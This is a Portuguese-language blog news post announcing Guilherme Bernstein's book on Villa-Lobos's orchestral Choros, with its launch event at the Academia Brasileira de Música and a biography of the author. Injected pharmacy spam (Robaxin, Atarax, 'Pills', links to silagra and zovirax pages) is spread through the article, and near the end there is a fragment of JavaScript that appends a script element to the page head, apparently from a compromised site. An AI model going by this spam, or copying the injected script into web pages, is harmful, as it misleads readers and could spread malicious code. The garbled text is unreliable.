LiteraturaNotíciaRio de Janeiro

Livro de Guilherme Bernstein sobre o “Choro” de Villa-Lobos

Marca a volta do compositor ao Brasil, também autor da trilha sonora do premiado filme “O outro lado da rua”.
what is the cost of robaxin

 

Sobre Poética e Forma em Villa-Lobos: Primitivismo e Estrutura nos Choros Orquestrais (Editora Prisma) tem lançamento terça-feira, 24 de março, às 16h30 na Academia Brasileira de Música, no Rio de Janeiro. O livro coroa a volta do autor, o regente e compositor Guilherme Bernstein ao Brasil, após 4 anos na Europa. Dentre diversas das suas composições, está a trilha sonora do filme O outro lado da rua, com Fernanda Montenegro.

Bernstein retorna ao país em tempos de comemorações dos 450 anos da Cidade do Rio de Janeiro e 70 anos da ABM com um trabalho que apresenta a mais carioca das músicas do brasileiríssimo Heitor Villa-Lobos, patrono da Academia e que realizará um coquetel aberto ao  público brindando o importante lançamento

 

Sobre o livro, explica Bernstein:

.
.

Os choros são, sem a menor sombra de dúvida, o mais celebrado conjunto de obras dentro do imenso universo criado por Villa-Lobos. Inquestionáveis em força e originalidade – “encarnação sonora da alma brasileira” – celebra-se e lamenta-se nos choros, ao mesmo tempo, sua irracionalidade, seu desprezo pelas formas e pela linearidade de pensamento.

Mas, o que são os choros? Sua poética e seus procedimentos composicionais são, de fato, originais? Mesmo a mais original criação possui precedentes. Como utilizar os mesmos adjetivos para caracterizar obras tão diversas, por vezes mesmo opostas, quanto os Choros n.6 e n.8? E como Villa-Lobos foi capaz de criar obras tão díspares em alguns poucos anos? A não ser que os anos não tenham sido assim tão poucos… este livro propõe uma viagem dupla.

De início, nos dirigimos à Europa e à efervescência cultural de princípios do século XX. Daí vem o Primitivismo nas Artes e na Música e aí encontraremos a centelha estética e os processos composicionais que fizeram Villa-Lobos se descobrir como criador de uma arte nacional. Depois, nos voltamos às obras em si, aos Choros orquestrais, em toda sua fascinante complexidade. Deste mergulho duplo sairemos com mais ferramentas para racionalizar a irracionalidade villalobiana, interpretar o gesto intuitivo e fazer sentido de seu universo criativo – um universo de sentido tão particular e original quanto sua inspiração, o Brasil visto pelos olhos do artista.

 

Guilherme Bernstein

É professor de regência e prática de orquestra da Universidade Federal do Estado do Rio de Janeiro – UniRio. Tem atuado à frente de orquestras como Sinfônica Nacional – UFF, Orquestras Sinfônicas de Porto Alegre, Goiânia e Recife, Experimental de Repertório – SP, Rimsky-Korsakov de São Petersburgo, solistas da Filarmônica de Israel, entre várias outras, além da própria Orquestra da UniRio, com a qual se apresenta regularmente no Theatro Municipal do Rio de Janeiro e na Sala Cecília Meireles, entre outros espaços musicais no Rio de Janeiro.

Foi Maestro Residente da Orquestra Sinfônica do Theatro Municipal – RJ e por vários anos Diretor Musical da Orquestra Sinfônica de Barra Mansa, conjunto que ajudou a formar e com o qual se apresentou com grande sucesso em várias cidades do Brasil e na Argentina. Composições suas como “Serenata para Cordas”, “Concerto para Piano n.1”, além da trilha sonora do filme “O Outro Lado da Rua”, têm sido apresentadas no Brasil, Europa e EUA e são publicadas pela Academia Brasileira de Música.

Guilherme Bernstein pós-graduo-se em regência orquestral pela Hartt School of Music, EUA, é Bacharel em Regência Musical e Mestre em Composição pela Escola de Música da Universidade Federal do Rio de Janeiro (UFRJ), e Doutor em Música pela UniRio.

Saiba mais: www.guilhermebernstein.com

 

Pills Sobre Poética e Forma em Villa-Lobos: Primitivismo e Estrutura nos Choros Orquestrais”

Editora: Prisma
Apresentação: Brochura, capa em papel cartonado, miolo em papel Avena 85g
Formato: 14 x 21cms
Páginas: 193
ISBN: 978-85-68274-47-7
Preço: R$ 49,00

À venda nas principais livrarias ou através do site: www.editoraprismas.com

 

SERVIÇO atarax available in australia

Dia 24 de março, terça-feira, às16h30

Lançamento do livro “Sobre Poética e Forma em Villa-Lobos: Primitivismo e Estrutura nos Choros Orquestrais”(Editora Prisma)

Coquetel aberto ao público

Academia Brasileira de Música – ABM
Rua da Lapa, 120 – 12º andar

Faixa etária : Livre

Acesso a cadeirantes

Pills Entrada franca

http://gonenativesurf.com/buy-cheap-silagra-100/ online online http://novianto-pn.mhs.narotama.ac.id/2018/02/02/zovirax-price/  d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {

Faça seu comentário

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.